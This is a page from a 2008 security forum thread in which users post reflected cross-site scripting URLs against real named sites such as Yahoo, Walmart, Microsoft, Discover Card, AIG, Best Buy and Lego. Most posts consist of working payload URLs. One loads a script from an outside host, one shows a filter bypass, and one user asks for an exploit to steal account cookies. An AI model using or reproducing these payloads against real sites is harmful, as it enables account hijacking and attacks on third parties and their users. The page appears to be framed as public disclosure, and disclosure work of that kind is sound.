Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5455565758596061626364...LastNext
Current Page: 59 of 65
Re: So it begins
Posted by: PaPPy
Date: November 01, 2008 07:28AM

removed by request

http://www.xssed.com/archive/author=PaPPy/



Edited 3 time(s). Last edit at 11/07/2008 07:01PM by PaPPy.

Options: ReplyQuote
Re: So it begins
Posted by: apnovi
Date: November 04, 2008 10:08AM

Im presuming its vunrable to SQL injection too, just havent got the time to play with it at the moment.

http://www.ellis-brigham.com/cgi-bin/psProdSrch.cgi?mode=user&orderBy=relevance&searchScope=shop&search_text=dd%22%3E%3CScript%3Ealert%28111%29%3B%3C%2Fscript%3E&Button=go

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: November 10, 2008 08:57AM

http://cf.yp.yahoo.com/about/createfeedback.html?stype=&what=&where=&ucas=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

I don't know why but it doesn't work all the time.

And

http://pix2.search.mud.yahoo.com/index.php?search=%25C0%2522%2520onmouseover%3Dalert(%2Fxss%2F.source)%2520\&x=0&y=0

Put your mouse over the search box.

http://www.rstcenter.com - Romanian Security Team
Inchirieri limuzine



Edited 2 time(s). Last edit at 11/10/2008 09:05AM by nemessis.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: November 25, 2008 07:29AM

More pXSS

Options: ReplyQuote
Re: So it begins
Posted by: skpx
Date: December 04, 2008 09:32AM

http://interweb.wikispaces.com/search/view/%3Cscript%3Ealert(%27x%27)%3C%2Fscript%3E+

doesn't seem to work on the main page search only when you search from a username.wikispaces.com ;\

Options: ReplyQuote
Re: So it begins
Posted by: skpx
Date: December 04, 2008 10:20AM

http://cutelayouts.org/Orkut_images/orkut_images.asp?cat=%3Cscript%3Edocument.getElementById(%27wrapper%27).innerHTML=%27%3Cp%3Eqwerty%3C/p%3E%27;%3C/script%3E

probably a better way to do this

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: December 04, 2008 03:02PM

skpx Wrote:
-------------------------------------------------------
> http://cutelayouts.org/Orkut_images/orkut_images.a
> sp?cat=%3Cscript%3Edocument.getElementById(%27wrap
> per%27).innerHTML=%27%3Cp%3Eqwerty%3C/p%3E%27;%3C/
> script%3E
>
> probably a better way to do this

ya just doing an end title </title>

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: December 05, 2008 04:46PM

Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: December 07, 2008 01:52PM

http://www.walmart.com/search/search-ng.do%3Fsearch_constraint%3D0%26ic%3D48_0%26search_query%3D%27%20onmouseover%3D%27alert%281%29%3B%26Find.x%3D0%26Find.y%3D0%26Find%3DFind

Sorry wally world

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: December 09, 2008 04:27PM

can i has farcry 2 plz?
http://farcry.uk.ubi.com/index.php?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.us.ubi.com/index.php?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.de.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.fr.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.it.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.es.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: December 10, 2008 01:06PM

http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)//

I had to bypass something like this (;|[a-zA-Z0-9]+\(.*\))+

PS: Upss! It's McAfee SECURE!

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]



Edited 1 time(s). Last edit at 12/10/2008 01:28PM by C1c4Tr1Z.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: December 12, 2008 11:00PM

http://anonym.to/javascript%3Aalert%28%27xss%27%29//http%3A//%20

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: tj
Date: December 13, 2008 08:13AM

is there any xss for hi5 ?

Options: ReplyQuote
Re: So it begins
Posted by: thrill
Date: December 13, 2008 02:01PM

No, but if you order now, you can get 2 XSS for myspace and 1 for facebook.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: December 14, 2008 06:09AM

but wait there's more! if you call with in the next 5 minutes you get a tube of mighty putty!

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: tj
Date: December 14, 2008 10:36AM

myspace and facebook xss doesnt work. can't login by the cookies...

i m looking for hi5

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: December 14, 2008 10:39AM

http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: December 14, 2008 10:53AM

@tj: as soon as you understood this - you might wanna try to master that. Then come back here.

Options: ReplyQuote
Re: So it begins
Posted by: tj
Date: December 14, 2008 11:01AM

hahaha funny :|

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: December 14, 2008 11:43AM

It wasn't meant to be funny. Check what this thread and this whole forum is about and then check if that matches with your posts.

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: December 15, 2008 06:43PM

http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') "

We love sarcasm.

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: euronymous
Date: December 18, 2008 06:50AM

Eclipse BIRT reflected XSS (all versions)

XSS will be fixed in milestone 2.5.0 ahaha

see my blog

http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/

Have fun

+++eat, fuck, hack+++

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: December 18, 2008 06:57AM

Talking about Eclipse...

http://localhost:8000/%22%3E%3Cscript%20src=//0x.lv%3E%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: euronymous
Date: December 19, 2008 02:09AM

ihihihih...nice mariuzzo :)
-------------------------------------------------------
> Talking about Eclipse...
>
> http://localhost:8000/%22%3E%3Cscript%20src=//0x.l
> v%3E%3C/script%3E

+++eat, fuck, hack+++

Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: December 19, 2008 08:53PM

http://www.boyhitscar.com/bhcgallery/Northeast%20Tour%202007.html?page=<script>alert(1)</script>

Love this band :D

Options: ReplyQuote
Re: So it begins
Date: December 20, 2008 07:27PM

https://www.discovercard.com/cardmembersvcs/acqs/app/exec?bizNameInput=%22%3E%3Cscript%3Ealert(1234)%3C%2Fscript%3E&bizNameOnCardInput=&legalEntityInput=&bizIndustryInput=&employerIdNumberInput1=&employerIdNumberInput2=&yearInBizInput=&businessStreetAddress1Input=&businessStreetAddress2Input=&businessCityInput=&businessStateInput=&businessZipInput=&firstNameInput=&middleNameInput=&lastNameInput=&suffixInput=&homePhoneAreaCode=&homePhonePrefix=&homePhoneSuffix=&emailInput=&homeStreetAddress1Input=&homeStreetAddress2Input=&homeCityInput=&homeStateInput=&homeZipInput=&ssnInput1=&ssnInput2=&ssnInput3=&dobMonthInput=&dobDayInput=&dobYearInput=&annualHouseholdIncomeInput=&housingStatusInput=&businessStreetAddress1Hidden=&businessStreetAddress2Hidden=&businessCityHidden=&businessStateHidden=&businessZipHidden=&authBuyerFirstNameInput=&authBuyerMiddleInitialInput=&authBuyerLastNameInput=&btCheckboxInput=&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton.x=97&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton.y=2&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton=Continue&aid=&pid=&sid=&iq_id=&dynaviewFromComponent=home&dynaviewMain=BIZP
By the looks of it every field is vuln to XSS.

http://www.aig.com/searchresults/search-results_20_17047.html?reqPageNum=1&reqEndPageListing=&qp_CountryCode=US&qp_LanguageCode=en&querySuggestSpellingOption=false&searchHighlightPrefix=searchTerm&queryHighlightOption=true&qt=%22%3E%3Cscript%3Ealert(%27We+got+no+moneis+%3Do(%27)%3C%2Fscript%3E =o(

http://www.bushbeans.com/jaysjournal/journalsubmit.php?promotionid=3&source=none&firstname=%22%3E%3Cscript%3Ealert(/beans/)%3C/script%3E&lastname=aaaa&email=affads%40mail.com&address1=&address2=&city=&state=&zip=11111&phone=&gender=F&Month=12&Day=1&Year=1111&emailformat=Text&oftenconsume=

Options: ReplyQuote
Re: So it begins
Date: December 21, 2008 03:56PM

Some MS XSSs...

http://www.microsoft.com/canada/athome/security/redirect.aspx?url=%22;alert(/CM/);// looks like they thought of 'security' when making the URL but didn't follow through on it.

http://www.microsoft.com/italy/pmi/voip/voip.aspx?url=javascript:alert(/CM/)

http://sport.ch.msn.com/scripts/tellafriend/tellafriend.php?url=%22%3E%3Cscript%3Ealert(/CM/)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: magicmac
Date: December 27, 2008 04:06AM

Hi guys! This is my first post :) The truth is, this XSS found me. :)

EthicalHacker.net

www.ethicalhacker.net/XSS%22onload=%22alert(document.domain)

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: December 27, 2008 08:37AM

jojo! nice magicmac.

MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: December 27, 2008 04:26PM

http://www.bestbuy.com/site/olspage.jsp?id=cat13506&type=page&skuId=9171709&productId=1218043585577&largeimgurl=/images/screenshots/9171/9171709_pcHomel_006_ss.jpg%22%20onmouseover%3D%22alert(1);&caption=PaPPy%20was%20here!&count=5&total=6

and this one
http://www.lego.com/legostores/features.asp?x=x&store=test<script>alert(1);</script>&cCode=3

also came across this one on mozilla
https://developer.mozilla.org/devnews/index.php/2008/12/18/firefox-20020-now-available-for-download2%22%3E%3C/a%3E%3Cscript%3Ealert(1);%3C/script%3E

http://www.xssed.com/archive/author=PaPPy/



Edited 2 time(s). Last edit at 01/02/2009 12:43PM by PaPPy.

Options: ReplyQuote
Pages: PreviousFirst...5455565758596061626364...LastNext
Current Page: 59 of 65


Sorry, only registered users may post in this forum.